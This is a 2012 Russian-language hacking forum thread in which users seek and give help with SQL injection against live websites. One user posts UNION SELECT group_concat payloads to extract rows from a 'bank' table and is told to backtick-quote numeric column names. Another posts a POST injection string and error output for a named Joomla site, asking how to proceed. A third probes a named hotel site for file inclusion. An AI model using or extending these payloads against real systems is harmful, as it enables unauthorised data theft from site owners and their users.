06.03.2012, 23:43
|
|
Новичок
Регистрация: 14.07.2011
Сообщений: 5
Провел на форуме:
1172
Репутация:
0
|
|
Возникла проблема со скулью... Пошерстил форум, вроде ничего не нашел(
Вообщем: есть скуль http://xxx.xx/xxx.php?num=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11
в интересующей базе названия столбцов id,1,2,3... при таком запросе http://xxx.xx/xxx.php?num=-1+UNION+SELECT+group_concat(id,0x3A,2,0x3A,1+SEPAR ATOR+0x0b),2,3,4,5,6,7,8,9,10,11+FROM+xxx.bank возвращает строки вида (ид):2:1
То есть ид вытаскивает корректно, а остальные поля выводит числами указанными... как по другому обратиться к этим столбцам?
|
|
|
06.03.2012, 23:58
|
|
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
Провел на форуме:
195266
Репутация:
53
|
|
Сообщение от nikaw87
Возникла проблема со скулью... Пошерстил форум, вроде ничего не нашел(
Вообщем: есть скуль http://xxx.xx/xxx.php?num=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11
в интересующей базе названия столбцов id,1,2,3... при таком запросе http://xxx.xx/xxx.php?num=-1+UNION+SELECT+group_concat(id,0x3A,2,0x3A,1+SEPAR ATOR+0x0b),2,3,4,5,6,7,8,9,10,11+FROM+xxx.bank возвращает строки вида (ид):2:1
То есть ид вытаскивает корректно, а остальные поля выводит числами указанными... как по другому обратиться к этим столбцам?
Указать имя поля вместо id?
Зы. а вообще нихрена не понял...
|
|
|
|
07.03.2012, 00:00
|
|
Новичок
Регистрация: 14.07.2011
Сообщений: 5
Провел на форуме:
1172
Репутация:
0
|
|
я не могу вытащить значения колонок 1 2 3... при обращении к ним, возвращает число-имя колонки
|
|
|
|
07.03.2012, 00:05
|
|
Новичок
Регистрация: 13.01.2012
Сообщений: 6
Провел на форуме:
1245
Репутация:
0
|
|
This is the parameter for the SQL injection , it could be POST SQL injection, I'm not entirely sure.
Код:
task=category§ionid=10&filter_order=on&filter=%BF%27%22%28&limitstart=0&filter_order_Dir=on&limit=on&id=54
To get the error I used HackBar for Firefox, I put in this first:
Код:
http://www.yaziyaz.net/Evrim/konular/54-inorganik-evrim.html
Then I clicked on 'Enable Post data' and put in the parameter and I clicked on 'Execute' and it gave me the following error(s):
Code:
Warning: Invalid argument supplied for foreach() in /home/yaziyaz2/public_html/Evrim/components/com_content/models/category.php on line 337
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/yaziyaz2/public_html/Evrim/libraries/joomla/database/database/mysql.php on line 344
How to inject next ??? |
|
|
|
07.03.2012, 00:05
|
|
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
Провел на форуме:
195266
Репутация:
53
|
|
Сообщение от nikaw87
я не могу вытащить значения колонок 1 2 3... при обращении к ним, возвращает число-имя колонки
Если mq=off, то юзай `1` и т.п.
|
|
|
|
07.03.2012, 00:07
|
|
Новичок
Регистрация: 14.07.2011
Сообщений: 5
Провел на форуме:
1172
Репутация:
0
|
|
Сообщение от Melfis
Если mq=off, то юзай `1` и т.п.
во, другое дело) спасибо =)
|
|
|
|
07.03.2012, 15:25
|
|
Участник форума
Регистрация: 05.09.2010
Сообщений: 147
Провел на форуме:
40748
Репутация:
78
|
|
Сообщение от d4rkn3ss
This is the parameter for the SQL injection , it could be POST SQL injection, I'm not entirely sure.
Код:
task=category§ionid=10&filter_order=on&filter=%BF%27%22%28&limitstart=0&filter_order_Dir=on&limit=on&id=54
To get the error I used HackBar for Firefox, I put in this first:
Код:
http://www.yaziyaz.net/Evrim/konular/54-inorganik-evrim.html
Then I clicked on 'Enable Post data' and put in the parameter and I clicked on 'Execute' and it gave me the following error(s):
Code:
Warning: Invalid argument supplied for foreach() in /home/yaziyaz2/public_html/Evrim/components/com_content/models/category.php on line 337
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/yaziyaz2/public_html/Evrim/libraries/joomla/database/database/mysql.php on line 344
How to inject next ??? Это русскоязычный форум. Пишите по-русски.
|
|
|
|
07.03.2012, 15:34
|
|
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
Провел на форуме:
107835
Репутация:
23
|
|
тут что-нибудь можно вытянуть?
_http://weddings-kl.sunwayhotels.com/guest/guest.asp?type=./
|
|
|
|
07.03.2012, 15:36
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401
Репутация:
0
|
|
Сообщение от er9j6@
тут что-нибудь можно вытянуть?
_http://weddings-kl.sunwayhotels.com/guest/guest.asp?type=./
нет.
зы: а что ты хотел показать точкой со слешем?)
|
|
|
|
07.03.2012, 15:37
|
|
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
Провел на форуме:
107835
Репутация:
23
|
|
Сообщение от d1v
нет.
зы: а что ты хотел показать точкой со слешем?)
что это похоже инклуд
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
